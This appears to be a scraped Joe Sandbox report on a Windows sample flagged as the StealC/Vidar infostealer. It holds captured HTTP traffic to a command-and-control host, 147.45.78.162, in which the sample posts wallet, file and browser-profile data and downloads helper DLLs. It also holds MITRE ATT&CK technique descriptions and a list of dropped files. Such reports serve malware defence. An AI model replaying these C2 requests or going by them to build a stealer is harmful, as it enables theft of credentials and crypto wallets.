47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"fplugins------AEBAKJDGHIIJJKFHCFCA--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 147.45.78.162Content-Length: 7017Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/sqlite3.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 147.45.78.162Content-Length: 945Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 147.45.78.162Content-Length: 150Connection: Keep-AliveCache-Control: no-cacheData Raw: 68 74 74 70 3a 2f 2f 31 34 37 2e 34 35 2e 37 38 2e 31 36 32 2f 61 31 37 38 36 31 62 39 63 62 36 66 31 61 35 33 2e 70 68 70 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: http://147.45.78.162/a17861b9cb6f1a53.php------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="file"------EGDBFIIECBGDGDGDHCAK--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBHost: 147.45.78.162Content-Length: 171Connection: Keep-AliveCache-Control: no-cacheData Raw: 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 69 63 72 6f 73 6f 66 74 5c 45 64 67 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a Data Ascii: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="file"------GIEBFHCAKFBGDHIDHIDB--
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/freebl3.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/mozglue.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/msvcp140.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/nss3.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/softokn3.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d82daa352ff6e06f/vcruntime140.dll HTTP/1.1Host: 147.45.78.162Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 147.45.78.162Content-Length: 1261Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEGHost: 147.45.78.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 2d 2d 0d 0a Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="message"wallets------FIDGHIIECGHDHJKFCAEG--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDHost: 147.45.78.162Content-Length: 459Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 2d 2d 0d 0a Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="message"files------DHJDAKEGDBFHCAAKJJJD--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 147.45.78.162Content-Length: 454Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"------CFBFHIEBKJKFHIEBFBAE--

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.78.162

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jlO7971vUz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAAEBAFBGIDHCBFHIECFCBGHIE

C:\ProgramData\BKJKEBGDHDAFHJKEGIID

C:\ProgramData\DGCFHIDA

C:\ProgramData\FBKFCFBFIDGCGDHJDBKFHCFBGI

C:\ProgramData\JDBFIIEBGCAKKEBFBAAFIIEGCF

C:\ProgramData\JDBGHIIDAECBFIDHIIDGIIIIII

C:\ProgramData\JDGCGHCGHCBFHJJKKJEH

C:\ProgramData\KFIJJEGH

C:\ProgramData\KJJJKFIIIJJJECAAEHDB

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
jlO7971vUz.exe

Function 017F7A60 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Function 017EF920 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Function 017EB630 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C4335A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 017F3560 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 017E4560 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00B32690 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 214
librarynativeloaderCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre